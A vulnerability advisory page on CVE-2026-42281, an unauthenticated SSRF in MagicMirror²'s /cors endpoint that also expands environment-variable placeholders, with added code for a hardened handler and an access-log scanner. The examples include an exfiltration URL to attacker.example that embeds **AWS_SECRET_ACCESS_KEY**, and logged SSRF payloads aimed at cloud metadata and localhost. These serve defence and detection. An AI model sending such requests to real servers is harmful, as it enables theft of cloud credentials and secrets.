CVE-2026-42281
Published: 14 May 2026
Summary
CVE-2026-42281 is a critical-severity Server-Side Request Forgery (SSRF, CWE-918) vulnerability in MagicMirror² (listed as vendor Magicmirror, product Magicmirror). Its CVSS base score is 9.2 (Critical).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 26.8% of all CVEs by EPSS exploit likelihood, is not currently listed in the CISA KEV catalog, and has a publicly referenced proof of concept.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Deeper analysis
MagicMirror² is an open source modular smart mirror platform affected by an unauthenticated Server-Side Request Forgery vulnerability tracked as CVE-2026-42281. The flaw resides in the /cors endpoint in all versions prior to 2.36.0 and is classified under CWE-918. The endpoint lets a caller make the server issue arbitrary HTTP requests, and it also expands environment-variable placeholders written as **VAR_NAME** inside the supplied URL, so the value of any variable in the server process's environment can be embedded in the outbound request and read back by whoever controls the destination.
Any remote attacker can exploit the issue without authentication to reach internal networks, cloud metadata endpoints, and localhost services; the resulting high-impact information disclosure is what drives the CVSS 9.2 score. The same requests can exfiltrate environment variables that may hold credentials or other sensitive configuration data, so an instance reachable from an untrusted network should treat every variable visible to the process as potentially disclosed until it is upgraded and those secrets are rotated.
The vulnerability is fixed in MagicMirror² version 2.36.0 according to the published GitHub Security Advisory. The EPSS score remains at 0.0326 with no material increase since disclosure.
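To make the two flaws concrete, here is an added example written for this page (not MagicMirror²'s own code) that models the described behaviour of a /cors-style handler as a pure function and places a hardened variant beside it. The function names, the exact **NAME** regex, the host allowlist, the reason strings and the demo input are all assumptions made for illustration and are not taken from the project or the advisory.

```javascript
// Added example for this page, not MagicMirror²'s own code. It models the
// behaviour the advisory describes for the /cors endpoint as a pure
// function and places a hardened variant next to it. The function names,
// the **NAME** regex, the allowlist and the reason strings are assumptions
// made for illustration.

// Vulnerable shape: substitute **NAME** from the process environment into a
// client-supplied URL and accept whatever results, with no target checks.
// (Passing process.env as `env` shows the real effect; the demo below uses
// a constructed object instead.)
function vulnerableResolveTarget(rawUrl, env) {
  const expanded = rawUrl.replace(/\*\*([A-Za-z0-9_]+)\*\*/g, (whole, name) =>
    Object.prototype.hasOwnProperty.call(env, name) ? String(env[name]) : whole
  );
  return { ok: true, url: expanded };
}

// Hardened shape: no environment substitution, a parsed URL instead of a
// regex over the raw request line, and a static hostname allowlist.
const LOCAL_NAMES = new Set(["localhost", "metadata", "metadata.google.internal"]);

function hardenedResolveTarget(rawUrl, allowedHosts) {
  // Reject placeholder syntax outright rather than trying to strip it.
  if (rawUrl.includes("**")) return { ok: false, reason: "placeholder syntax" };
  let u;
  try {
    // WHATWG parsing canonicalises numeric hosts: 2852039166 and 0x7f000001
    // come back as 169.254.169.254 and 127.0.0.1, so they cannot slip past
    // the literal-IP check below.
    u = new URL(rawUrl);
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  if (u.protocol !== "http:" && u.protocol !== "https:") return { ok: false, reason: "scheme" };
  if (u.username || u.password) return { ok: false, reason: "userinfo" };
  const host = u.hostname.toLowerCase();
  if (host.startsWith("[")) return { ok: false, reason: "ipv6 literal" };
  if (/^\d{1,3}(?:\.\d{1,3}){3}$/.test(host)) return { ok: false, reason: "ipv4 literal" };
  if (LOCAL_NAMES.has(host) || host.endsWith(".localhost")) return { ok: false, reason: "local name" };
  if (!allowedHosts.has(host)) return { ok: false, reason: "host not allowlisted" };
  return { ok: true, url: u.toString() };
}

// Constructed demo input: a URL an attacker might send, and a constructed
// environment standing in for process.env.
const ATTACKER_URL = "http://attacker.example/?k=**AWS_SECRET_ACCESS_KEY**";
const DEMO_ENV = { AWS_SECRET_ACCESS_KEY: "constructed-secret" };
const ALLOWED = new Set(["api.openweathermap.org"]);

function demo() {
  return {
    leaked: vulnerableResolveTarget(ATTACKER_URL, DEMO_ENV).url,
    blocked: hardenedResolveTarget(ATTACKER_URL, ALLOWED).reason,
    metadata: hardenedResolveTarget("http://2852039166/latest/meta-data/", ALLOWED).reason,
  };
}

console.log(demo());
```

Two caveats on the hardened shape. A hostname allowlist only controls what the client may name, not where the name resolves: a DNS rebinding of an allowlisted host still lands on an internal address, so the fetch layer should resolve the name itself and check the resulting address (or pin it) before connecting. And because the check works on a parsed URL, the same function must be the only path to the outbound request; any second code path that reads the raw query string with a regex reintroduces the original problem.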
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-30313
Vulnerability details
MagicMirror² is an open source modular smart mirror platform. Prior to 2.36.0, an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets. This vulnerability is fixed in 2.36.0.
- CWE(s): CWE-918 (Server-Side Request Forgery)
Related Threats
MITRE ATT&CK Enterprise Techniques
- T1190 Exploit Public-Facing Application
- T1552.005 Unsecured Credentials: Cloud Instance Metadata API
Why these techniques?
The unauthenticated SSRF on the public /cors endpoint is a direct instance of T1190. Because the forged requests can be aimed at cloud instance metadata services, the same flaw enables T1552.005, retrieval of instance credentials through the metadata API; the **VAR_NAME** expansion adds a second credential-disclosure path that needs no metadata service at all.
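For the detection side of these two techniques, here is an added example (not part of the original page and not project code): a small scanner over web-server access log lines that flags /cors requests whose url parameter targets a cloud metadata, loopback, link-local or private host, or carries **NAME** placeholder syntax. The log lines are constructed for the example in the common "combined" layout, and the assumption that the target is everything after the first `url=` in the request path, percent-decoded, is mine rather than the project's parsing.

```javascript
// Added example, not from the page or the project: scan access log lines
// for /cors requests aimed at internal or metadata hosts, or carrying
// **NAME** placeholders. Log lines are constructed for the example.

// Constructed sample log (combined format; client IPs are documentation
// addresses). Line 4 is percent-encoded, line 6 uses a decimal IP.
const SAMPLE_LOG = [
  '203.0.113.7 - - [14/May/2026:10:01:22 +0000] "GET /cors?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 812',
  '203.0.113.7 - - [14/May/2026:10:01:40 +0000] "GET /cors?url=http://203.0.113.9/x?k=**OPENWEATHER_API_KEY** HTTP/1.1" 200 12',
  '192.168.1.20 - - [14/May/2026:10:02:01 +0000] "GET /cors?url=https://api.openweathermap.org/data/2.5/weather?q=Berlin HTTP/1.1" 200 1994',
  '203.0.113.7 - - [14/May/2026:10:02:30 +0000] "GET /cors?url=http%3A%2F%2Flocalhost%3A8080%2Fadmin HTTP/1.1" 200 533',
  '192.168.1.20 - - [14/May/2026:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 4021',
  '203.0.113.7 - - [14/May/2026:10:03:15 +0000] "GET /cors?url=http://2852039166/latest/meta-data/ HTTP/1.1" 200 812',
];

// client, timestamp and request path from a combined-format line.
const REQUEST_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|HEAD|POST) (\S+) HTTP\/[\d.]+"/;

// Hosts a public smart-mirror instance has no business fetching from:
// link-local (cloud metadata), loopback, RFC 1918, well-known metadata
// names, and IPv6 loopback / ULA / link-local literals (bracketed, as the
// WHATWG URL hostname getter returns them).
const RISKY_HOST_RE = /^(?:169\.254\.\d+\.\d+|127\.\d+\.\d+\.\d+|10\.\d+\.\d+\.\d+|172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+|192\.168\.\d+\.\d+|0\.0\.0\.0|localhost|metadata|metadata\.google\.internal|\[::1\]|\[f[cd][0-9a-f:]*\]|\[fe80:[0-9a-f:]*\])$/i;

// Returns a reason string for a suspicious target, or null for a benign one.
function classifyTarget(target) {
  if (target.includes("**")) return "env placeholder";
  let host;
  try {
    // URL parsing canonicalises 2852039166 to 169.254.169.254 before the
    // host is matched, so encoded or numeric forms do not evade the check.
    host = new URL(target).hostname.toLowerCase();
  } catch {
    return "unparseable target";
  }
  return RISKY_HOST_RE.test(host) ? "internal/metadata host" : null;
}

function findSuspiciousCorsRequests(lines) {
  const hits = [];
  for (const line of lines) {
    const m = REQUEST_RE.exec(line);
    if (!m) continue;
    const [, clientIp, when, path] = m;
    const idx = path.indexOf("url=");
    if (!path.startsWith("/cors") || idx === -1) continue;
    // Assumption: the target is everything after the first "url=", decoded.
    let target = path.slice(idx + 4);
    try {
      target = decodeURIComponent(target);
    } catch {
      // keep the raw value; a malformed escape is itself worth seeing
    }
    const reason = classifyTarget(target);
    if (reason) hits.push({ clientIp, when, target, reason });
  }
  return hits;
}

console.log(findSuspiciousCorsRequests(SAMPLE_LOG));
```

The blocklist regex is for triage, not for the fix: it will miss a redirect from an allowed external host to an internal address, and it only sees what the web server logged, so a benign-looking external target that returned 302 to the metadata service leaves no trace here. The server-side correction is the allowlist-and-parse approach in the earlier example plus outbound address checking; this scanner is for finding out whether anyone has already tried.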
Mitigating Controls (NIST 800-53 r5)
- AC-3 (Access Enforcement): enforces authorization checks on the /cors endpoint so unauthenticated remote attackers cannot initiate arbitrary SSRF requests.
- SI-10 (Information Input Validation): requires validation of the user-supplied URL, and rejection of **VAR_NAME** expansion, to block requests to internal, localhost, or metadata endpoints.
- AC-4 (Information Flow Enforcement): enforces an information-flow policy that denies server-initiated requests from reaching internal networks or cloud metadata services.
In practice the control that matters first is the upgrade to 2.36.0. Where that has to wait, the compensating control is egress filtering for the MagicMirror² process or container (at minimum, blocking the link-local metadata address 169.254.169.254, loopback and the RFC 1918 ranges as outbound destinations), together with not exposing the instance beyond a trusted network and rotating any secret that was present in its environment.